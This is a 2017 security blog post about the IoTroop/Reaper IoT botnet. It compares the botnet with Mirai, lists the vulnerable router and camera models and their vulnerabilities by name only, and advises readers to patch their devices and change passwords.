IoTroop Botnet - Reaper of the Internet

October 24, 2017 Security and Compliance, MOVEit

The spiritual successor to the Mirai botnet is now looming inside millions of IoT devices. Will it wreak havoc on the Internet, or can we stop it in its tracks?

Remember Mirai? I don’t blame you if you can’t. A lot has happened since that day in October 2016 when much of the internet crashed as Mirai took down swaths of web servers residing on the East Coast of the United States. Since then, we’ve had WannaCry, NotPetya and the Equifax breach occupy the news and it seems like cyber attacks are becoming common place.

Damage Caused By The Mirai Botnet

Ultimately, Mirai crashed much of the internet by creating a botnet out of Linux IoT devices with little or no password protection, such as unprotected IP Cameras and home routers. Each of these devices was then used as a bot to request small amounts of bandwidth from target websites. Mirai ultimately enlisted over 100,000 devices causing the normal traffic load on target servers to exceed capacity by 10 to 20 times and creating the largest DDoS attack ever seen.

Related Article: CCleaner Supply Chain Attack Exposes Millions Of Windows Users

This DDoS attack started by going after KrebsOnSecurity, a website created by cyber security journalist, Brian Krebs. His web servers received botnet traffic as a high as 620 Gbps. Other websites saw traffic to their websites go as high as 1 Tbps. The botnet took a particular aim at Dyn, a DNS service based in New Hampshire, in the end effecting PayPal, Reddit, Netflix, Twitter, and many more popular services. 

IoTroop or Reaper Looming On The Horizon

Well, it turns out there is another botnet possibly based on Mirai that is lying dormant and may take a death grip on the Web the likes of which we’ve never seen before. This version of the botnet is called Reaper or IoTroop, and the name is fitting. This botnet is enlisting some 10,000 IoT devices a day as bots and may just give the challenge of taking down the whole internet a run for its money.

What’s interesting is we know about it before it has been unleashed, unlike Mirai. Checkpoint Research, an Israeli security firm posted about the growing botnet last week. Checkpoint Research goes into detail about the worm building this botnet, which you can read about here.

In a nutshell, this worm spreads from device to device using known exploits in devices and already resides in millions of devices. IoTroop is different than Mirai in that this isn’t a case of poor and default passwords protecting devices. 

Below is a full list of effected devices from Checkpoint Research:

Vendor

Protection Name

GoAhead

Wireless IP Camera (P2P) WIFICAM Cameras Information Disclosure

Wireless IP Camera (P2P) WIFICAM Cameras Remote Code Execution

D-Link

D-Link 850L Router Remote Code Execution

D-Link DIR800 Series Router Remote Code Execution

D-Link DIR800 Series Router Information Disclosure

D-Link 850L Router Remote Unauthenticated Information Disclosure

D-Link 850L Router Cookie Overflow Remote Code Execution

Dlink IP Camera Video Stream Authentication Bypass – Ver2

Dlink IP Camera Luminance Information Disclosure – Ver2

D-Link DIR-600/300 Router Unauthenticated Remote Command Execution

Dlink IP Camera Authenticated Arbitrary Command Execution – Ver2

TP-Link

TP-Link Wireless Lite N Access Point Directory Traversal

TP-LINK WR1043N Multiple Cross-Site Request Forgery

 

Netgear DGN Unauthenticated Command Execution

Netgear ReadyNAS Remote Command Execution

NETGEAR

Netgear DGN2200 dnslookup.cgi Command Injection

Netgear ProSAFE NMS300 fileUpload.do Arbitrary File Upload

NETGEAR Routers Authentication Bypass

NETGEAR ReadyNAS np_handler Code Execution

Netgear R7000 and R6400 cgi-bin Command Injection

AVTECH

AVTECH Devices Multiple Vulnerabilities

MikroTik

MikroTik RouterOS SNMP Security Bypass

MikroTik RouterOS Admin Password Change

Mikrotik Router Remote Denial Of Service

Linksys

Belkin Linksys WRT110 Remote Command Execution – Ver2

Linksys WRH54G HTTP Management Interface DoS Code Execution – Ver2

Belkin Linksys WRT110 Remote Command Execution

Belkin Linksys Multiple Products Directory Traversal

Belkin Linksys E1500/E2500 Remote Command Execution

Cisco Linksys PlayerPT ActiveX Control Buffer Overflow

Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow

Synology

Synology DiskStation Manager SLICEUPLOAD Code Execution

Linux

Linux System Files Information Disclosure

Can We Stop IoTroop Or Is It Too Late?

Security researches have caught this botnet in its tracks, so there may be time to stop it before it attacks. A good way to think of these botnets is like a ticking time bomb. If you find the bomb in time, experts have a chance to dismantle it. If it goes unnoticed however, you can expect a messy day for the Internet some time in the future.

It isn’t like these botnets just cause issues with services we use for entertainment and social media. Our world is so wired into web services, that when these web services get taken down en masse, it can cause issues with critical infrastructure, such as the electrical grid, hospitals, etc. 

What you can do now is make sure you patch all your IoT devices and routers. It also appears that simply changing your password on any home-based IoT devices (routers, IP cameras, etc.) will defeat the bot on infected devices. It won’t harm you personally or your hardware, but it will have larger implications if Reaper isn’t thwarted.

Greg Mooney

Greg is a technologist and data geek with over 10 years in tech. He has worked in a variety of industries as an IT manager and software tester. Greg is an avid writer on everything IT related, from cyber security to troubleshooting.

Read next Managed File Transfer - What is it?